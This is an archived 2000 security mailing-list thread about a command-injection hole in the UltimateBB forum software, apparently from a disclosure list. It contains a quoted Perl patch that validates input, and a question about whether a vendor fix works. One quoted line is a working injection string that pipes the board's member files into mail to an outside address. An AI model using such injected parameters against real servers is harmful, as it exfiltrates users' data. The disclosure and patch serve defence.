according to the folks at UBB, the latest version 5.43d, fixes this
vulnerability. Has anyone been able to verify if this is in fact correct?
Irwin
> -----Original Message-----
> From: Jordan Ritter [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, February 15, 2000 8:48 PM
> To: [EMAIL PROTECTED]
> Subject: Re: perl-cgi hole in UltimateBB by Infopop Corp.
>
>
> On Mon, 14 Feb 2000, Kevin Hillabolt wrote:
>
> # It works on the full version also...
> #
> # Little different syntax:
> # topic=012345.cgi|cat%20../Members/*|mail [EMAIL PROTECTED]|
> # (note the ../ on the Members. You have to go up a
> directory to get the
> # file. Maybe you could stop it via simple folder permissions??)
>
> Provided with no warranty. unescape() borrowed from the far superior
> CGI.pm. It appears to work, but I haven't checked it for
> completeness.
> The ubb scripts are a programming disaster, and pass around
> metachars and
> filenames through form parameters, making input validation difficult.
> The patch below selectively validates input based on the name of the
> variable we're validating (i.e. only certain variables are dangerous;
> others are just dumb and not a risk). It's better to try and
> validate at
> the top leven then code review the source and try to patch
> every idiotic
> mistake that was made. At the very least, this stops the
> specific attack
> that was posted. There could be other holes that this
> doesn't cover, or
> alternative ways to carry out the same attack. Hopefully
> Infopop will get
> their act together soon.
>
> I can't believe they distribute this crap as commercial software.
> Actually, what I can't believe is how many people paid for
> it. God help
> us all.
>
>
> --jordan
>
>
> $ diff ubb_library.pl ubb_library.pl.orig
> 84,93d83
> < # unescape URL-encoded data
> < sub unescape {
> < shift() if ref($_[0]);
> < my $todecode = shift;
> < return undef unless defined($todecode);
> < $todecode =~ tr/+/ /; # pluses become spaces
> < $todecode =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;
> < return $todecode;
> < }
> <
> 1047a1038
> >
> 1112,1120d1102
> < # clean input
> < if ($key =~ /^(forum|topic|number|replynum)$/i) {
> < my($newval) = &unescape($val);
> <
> < if ($newval !~ /^([ -\@\w.]+)$/) {
> < $val = "bad_input";
> < }
> < }
> <
> 1266,1284d1247
> <
> < my(@out);
> < foreach $row (@in) {
> < my($name,$value) = split ("=", $row);
> <
> < if ($name =~ /^(forum|topic|number|replynum)$/i) {
> < my($newvalue) = &unescape($value);
> <
> < if ($newvalue !~ /^([ -\@\w.]+)$/) {
> < $value = "bad_input";
> < }
> <
> < push @out, "$name=$value";
> < } else {
> < push @out, $row;
> < }
> < }
> < @in = @out;
>
Irwin Lazar (E-mail).vcf
